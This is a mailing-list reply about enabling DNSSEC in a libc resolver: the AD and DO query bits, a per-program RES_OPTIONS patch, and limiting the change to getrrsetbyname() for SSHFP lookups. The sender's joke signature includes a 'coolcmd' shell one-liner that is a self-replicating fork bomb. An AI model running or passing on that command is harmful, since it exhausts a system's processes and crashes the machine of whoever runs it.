On Wed, 17 Nov 2021 20:46:46 +0000, Otto Moerbeek <[email protected]> said:
> Well, I should have been more clear as well, dig sets both the AD bit
> (by default) and the DO bit (on +dnssec). More clienst do this. This
> is part of the can of worms.
Right, yeah. I misunderstood the AD bit in the query being the
trigger, but as you say it's the DO, and as the RFC says, queries
shouldn't set the AD.
> You are forcing *all* clients resolving to use dnssec. Only a solution
> that limits the scope to the the smallest case (ssh doing an
> getrrsetbyname() for DNS_RDATATYPE_SSHFP is likely acceptable. Sadly
> the context used by resolving is program-wide, so setting a flag in
> _res is also not going to work.
Yeah. For the machine I'm on I actually want all DNS requests system
wide to use DNSSEC. So personally that's working as intended. But I
see your point.
Currently there's no way to get a signed response, right?
With my patch for a per-program level option I just successfully
tested:
RES_OPTIONS=dnssec ssh foo.example.com
But of course it doesn't limit to just getrrsetbyname().
Is the asr_ctx (where flags look like they live) program-wide, or just
thread wide? I can basically hear you cringing already, so maybe the
only real solution is to have getrrsetbyname_async_run() pass in flags
to _res_query_async_ctx()->setup_query() to OR in the option?
And then maybe have getrrsetbyname() call that stack twice, once with
and once without RES_USE_DNSSEC, in case DNSSEC is broken?
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "[email protected]" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt"; };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
